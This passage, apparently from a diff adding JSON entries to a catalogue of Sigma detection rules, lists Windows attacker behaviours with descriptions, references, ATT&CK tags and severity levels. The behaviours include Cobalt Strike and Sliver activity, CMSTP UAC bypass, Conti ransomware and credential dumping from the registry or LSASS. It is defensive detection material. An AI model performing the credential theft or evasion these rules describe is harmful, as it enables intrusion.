the remote debugging flags. Which is a technique often used to perform browser injection attacks", + "uuid": "b3d34dc5-2efd-4ae3-845f-8ec14921f449", + "value": "Browser Started with Remote Debugging", + "meta": { + "refs": [ + "https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf", + "https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browser_remote_debugging.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1185" + ], + "creation_date": "2022/07/27", + "filename": "proc_creation_win_browser_remote_debugging.yml", + "author": "pH-T, Nasreddine Bencherchali (update)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects WMI SquiblyTwo Attack with possible renamed WMI by looking for imphash", + "uuid": "8d63dadf-b91b-4187-87b6-34a1114577ea", + "value": "SquiblyTwo Execution", + "meta": { + "refs": [ + "https://subt0x11.blogspot.ch/2018/04/wmicexe-whitelisting-bypass-hacking.html", + "https://twitter.com/mattifestation/status/986280382042595328", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bypass_squiblytwo.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1047", + "attack.t1220", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_bypass_squiblytwo.yml", + "author": "Markus Neis, Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", + "uuid": "42333b2c-b425-441c-b70e-99404a17170f", + "value": "Sliver C2 Implant Activity Pattern", + "meta": { + "refs": [ + "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36", + "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_c2_sliver.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/08/25", + "filename": "proc_creation_win_c2_sliver.yml", + "author": "Nasreddine Bencherchali, Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", + "uuid": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", + "value": "F-Secure C3 Load by Rundll32", + "meta": { + "refs": [ + "https://github.com/FSecureLABS/C3/blob/11a081fd3be2aaf2a879f6b6e9a96ecdd24966ef/Src/NodeRelayDll/NodeRelayDll.cpp#L12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_c3_load_by_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ], + "creation_date": "2021/06/02", + "filename": "proc_creation_win_c3_load_by_rundll32.yml", + "author": "Alfie Champion (ajpc500)", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.", + "uuid": "242301bc-f92f-4476-8718-78004a6efd9f", + "value": "Suspicious Load DLL via CertOC.exe", + "meta": { + "refs": [ + "https://twitter.com/sblmsrsn/status/1445758411803480072?s=20", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2", + "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2021/10/23", + "filename": "proc_creation_win_certoc_execution.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", + "uuid": "6c6d9280-e6d0-4b9d-80ac-254701b64916", + "value": "NTLM Coercion Via Certutil.exe", + "meta": { + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/issues/243", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/09/01", + "filename": "proc_creation_win_certutil_ntlm_coercion.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.", + "uuid": "3d3aa6cd-6272-44d6-8afc-7e88dfef7061", + "value": "Change Default File Association", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.001/T1546.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_change_default_file_association.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.001" + ], + "creation_date": "2019/10/21", + "filename": "proc_creation_win_change_default_file_association.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "low", + "falsepositive": [ + "Admin activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when a program changes the default file association of any extension to an executable", + "uuid": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", + "value": "Change Default File Association To Executable", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/assoc", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_change_default_file_assoc_susp.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.001" + ], + "creation_date": "2022/06/28", + "filename": "proc_creation_win_change_default_file_assoc_susp.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", + "uuid": "8b0e12da-d3c3-49db-bb4f-256703f380e5", + "value": "Chisel Tunneling Tool Usage", + "meta": { + "refs": [ + "https://github.com/jpillora/chisel/", + "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chisel_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090.001" + ], + "creation_date": "2022/09/13", + "filename": "proc_creation_win_chisel_usage.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Some false positives may occure with other tools with similar commandlines" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", + "uuid": "27ba3207-dd30-4812-abbf-5d20c57d474e", + "value": "Powershell ChromeLoader Browser Hijacker", + "meta": { + "refs": [ + "https://redcanary.com/blog/chromeloader/", + "https://emkc.org/s/RJjuLa", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chrome_load_extension.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1176" + ], + "creation_date": "2022/06/19", + "filename": "proc_creation_win_chrome_load_extension.yml", + "author": "Aedan Russell, frack113 (sigma)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", + "uuid": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "value": "CleanWipe Usage", + "meta": { + "refs": [ + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/CleanWipe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cleanwipe.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/12/18", + "filename": "proc_creation_win_cleanwipe.yml", + "author": "Nasreddine Bencherchali @nas_bench", + "level": "high", + "falsepositive": [ + "Legitimate administrative use (Should be investigated either way)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may collect data stored in the clipboard from users copying information within or between applications.", + "uuid": "ddeff553-5233-4ae9-bbab-d64d2bd634be", + "value": "Use of CLIP", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/clip", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1115/T1115.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_clip.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ], + "creation_date": "2021/07/27", + "filename": "proc_creation_win_clip.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of cmdkey to look for cached credentials", + "uuid": "07f8bdc2-c9b3-472a-9817-5a670b872f53", + "value": "Cmdkey Cached Credentials Recon", + "meta": { + "refs": [ + "https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation", + "https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.005" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_cmdkey_recon.yml", + "author": "jmallette, Florian Roth, Nasreddine Bencherchali (update)", + "level": "high", + "falsepositive": [ + "Legitimate administrative tasks" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n", + "uuid": "379fa130-190e-4c3f-b7bc-6c8e834485f3", + "value": "Windows Cmd Delete File", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_delete.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ], + "creation_date": "2022/01/15", + "filename": "proc_creation_win_cmd_delete.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Legitimate scripts" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects possible payload obfuscation via the commandline", + "uuid": "a77c1610-fc73-4019-8e29-0f51efc04a51", + "value": "Suspicious Dosfuscation Character in Commandline", + "meta": { + "refs": [ + "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_dosfuscation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/02/15", + "filename": "proc_creation_win_cmd_dosfuscation.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect use of \"/R <\" to read and execute a file via cmd.exe", + "uuid": "00a4bacd-6db4-46d5-9258-a7d5ebff4003", + "value": "Read and Execute a File Via Cmd.exe", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_read_contents.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ], + "creation_date": "2022/08/20", + "filename": "proc_creation_win_cmd_read_contents.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Use \">\" to redicrect information in commandline", + "uuid": "4f4eaa9f-5ad4-410c-a4be-bc6132b0175a", + "value": "Redirect Output in CommandLine", + "meta": { + "refs": [ + "https://ss64.com/nt/syntax-redirection.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_redirect.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ], + "creation_date": "2022/01/22", + "filename": "proc_creation_win_cmd_redirect.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects inline windows shell commands redirecting output via the \">\" symbol to a suspicious location", + "uuid": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", + "value": "Suspicious CMD Shell Redirect", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ], + "creation_date": "2022/07/12", + "filename": "proc_creation_win_cmd_redirection_susp_folder.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate admin scripts" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", + "uuid": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", + "value": "CMSTP UAC Bypass via COM Object Access", + "meta": { + "refs": [ + "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://twitter.com/hFireF0X/status/897640081053364225", + "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" + ], + "creation_date": "2019/07/31", + "filename": "proc_creation_win_cmstp_com_object_access.yml", + "author": "Nik Seetharaman, Christian Burkard", + "level": "high", + "falsepositive": [ + "Legitimate CMSTP use (unlikely in modern enterprise environments)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "uuid": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", + "value": "CMSTP Execution Process Creation", + "meta": { + "refs": [ + "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" + ], + "creation_date": "2018/07/16", + "filename": "proc_creation_win_cmstp_execution_by_creation.yml", + "author": "Nik Seetharaman", + "level": "high", + "falsepositive": [ + "Legitimate CMSTP use (unlikely in modern enterprise environments)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", + "uuid": "647c7b9e-d784-4fda-b9a0-45c565a7b729", + "value": "Operator Bloopers Cobalt Strike Commands", + "meta": { + "refs": [ + "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", + "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", + "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_cmd.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ], + "creation_date": "2022/05/06", + "filename": "proc_creation_win_cobaltstrike_bloopers_cmd.yml", + "author": "_pete_0, TheDFIRReport", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects use of Cobalt Strike module commands accidentally entered in the CMD shell", + "uuid": "4f154fb6-27d1-4813-a759-78b93e0b9c48", + "value": "Operator Bloopers Cobalt Strike Modules", + "meta": { + "refs": [ + "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", + "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", + "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_modules.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ], + "creation_date": "2022/05/06", + "filename": "proc_creation_win_cobaltstrike_bloopers_modules.yml", + "author": "_pete_0, TheDFIRReport", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", + "uuid": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", + "value": "CobaltStrike Load by Rundll32", + "meta": { + "refs": [ + "https://www.cobaltstrike.com/help-windows-executable", + "https://redcanary.com/threat-detection-report/", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ], + "creation_date": "2021/06/01", + "filename": "proc_creation_win_cobaltstrike_load_by_rundll32.yml", + "author": "Wojciech Lesicki", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects process patterns found in Cobalt Strike beacon activity (see reference for more details) and also cases in which a China Chopper like webshell is used to run whoami", + "uuid": "f35c5d71-b489-4e22-a115-f003df287317", + "value": "CobaltStrike Process Patterns", + "meta": { + "refs": [ + "https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/", + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2021/07/27", + "filename": "proc_creation_win_cobaltstrike_process_patterns.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Other programs that cause these patterns (please report)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "detects the usage of path traversal in cmd.exe indicating possible command/argument confusion/hijacking", + "uuid": "087790e3-3287-436c-bccf-cbd0184a7db1", + "value": "Cmd.exe CommandLine Path Traversal", + "meta": { + "refs": [ + "https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/", + "https://twitter.com/Oddvarmoe/status/1270633613449723905", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_commandline_path_traversal.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ], + "creation_date": "2020/06/11", + "filename": "proc_creation_win_commandline_path_traversal.yml", + "author": "xknow @xknow_infosec, Tim Shelton", + "level": "high", + "falsepositive": [ + "(not much) some benign Java tools may product false-positive commandlines for loading libraries" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal", + "uuid": "1327381e-6ab0-4f38-b583-4c1b8346a56b", + "value": "Command Line Path Traversal Evasion", + "meta": { + "refs": [ + "https://twitter.com/hexacorn/status/1448037865435320323", + "https://twitter.com/Gal_B1t/status/1062971006078345217", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "creation_date": "2021/10/26", + "filename": "proc_creation_win_commandline_path_traversal_evasion.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Google Drive", + "Citrix" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", + "uuid": "435e10e4-992a-4281-96f3-38b11106adde", + "value": "Computer Discovery And Export Via Get-ADComputer Cmdlet", + "meta": { + "refs": [ + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_computer_discovery_get_adcomputer.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ], + "creation_date": "2022/11/10", + "filename": "proc_creation_win_computer_discovery_get_adcomputer.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", + "uuid": "ee5e119b-1f75-4b34-add8-3be976961e39", + "value": "Conhost.exe CommandLine Path Traversal", + "meta": { + "refs": [ + "https://pentestlab.blog/2020/07/06/indirect-command-execution/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_path_traversal.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ], + "creation_date": "2022/06/14", + "filename": "proc_creation_win_conhost_path_traversal.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Conti ransomware command line ioc", + "uuid": "689308fc-cfba-4f72-9897-796c1dc61487", + "value": "Conti Ransomware Execution", + "meta": { + "refs": [ + "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/", + "https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conti_cmd_ransomware.yml" + ], + "tags": [ + "attack.impact", + "attack.s0575", + "attack.t1486" + ], + "creation_date": "2021/10/12", + "filename": "proc_creation_win_conti_cmd_ransomware.yml", + "author": "frack113", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a command used by conti to dump database", + "uuid": "2f47f1fd-0901-466e-a770-3b7092834a1b", + "value": "Conti Backup Database", + "meta": { + "refs": [ + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conti_sqlcmd.yml" + ], + "tags": [ + "attack.collection", + "attack.t1005" + ], + "creation_date": "2021/08/16", + "filename": "proc_creation_win_conti_sqlcmd.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the malicious use of a control panel item", + "uuid": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "value": "Control Panel Items", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1196/", + "https://ired.team/offensive-security/code-execution/code-execution-through-control-panel-add-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_control_panel_item.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218.002", + "attack.persistence", + "attack.t1546" + ], + "creation_date": "2020/06/22", + "filename": "proc_creation_win_control_panel_item.yml", + "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Files with well-known filenames (sensitive files with credential data) copying", + "uuid": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", + "value": "Copying Sensitive Files with Credential Data", + "meta": { + "refs": [ + "https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003", + "car.2013-07-001", + "attack.s0404" + ], + "creation_date": "2019/10/22", + "filename": "proc_creation_win_copying_sensitive_files_with_credential_data.yml", + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "level": "high", + "falsepositive": [ + "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the copy command to copy files with the .dmp extensions from a remote share", + "uuid": "044ba588-dff4-4918-9808-3f95e8160606", + "value": "Copy DMP Files From Share", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_copy_dmp_from_share.yml" + ], + "tags": [ + "attack.credential_access" + ], + "creation_date": "2022/09/27", + "filename": "proc_creation_win_copy_dmp_from_share.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", + "uuid": "f26307d8-14cd-47e3-a26b-4b4769f24af6", + "value": "CrackMapExec Process Patterns", + "meta": { + "refs": [ + "https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crackmapexec_patterns.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2022/03/12", + "filename": "proc_creation_win_crackmapexec_patterns.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud", + "uuid": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", + "value": "Node Process Executions", + "meta": { + "refs": [ + "https://twitter.com/mttaggart/status/1511804863293784064", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_creative_cloud_node_abuse.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127", + "attack.t1059.007" + ], + "creation_date": "2022/04/06", + "filename": "proc_creation_win_creative_cloud_node_abuse.yml", + "author": "Max Altgelt", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS", + "uuid": "b7966f4a-b333-455b-8370-8ca53c229762", + "value": "Dropping Of Password Filter DLL", + "meta": { + "refs": [ + "https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/", + "https://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_credential_access_via_password_filter.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1556.002" + ], + "creation_date": "2020/10/29", + "filename": "proc_creation_win_credential_access_via_password_filter.yml", + "author": "Sreeman", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Credential Acquisition via Registry Hive Dumping", + "uuid": "4d6c9da1-318b-4edf-bcea-b6c93fa98fd0", + "value": "Credential Acquisition via Registry Hive Dumping", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/credential-acquisition-via-registry-hive-dumping.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_credential_acquisition_registry_hive_dumping.yml" + ], + "tags": [ + "attack.credential_access", + 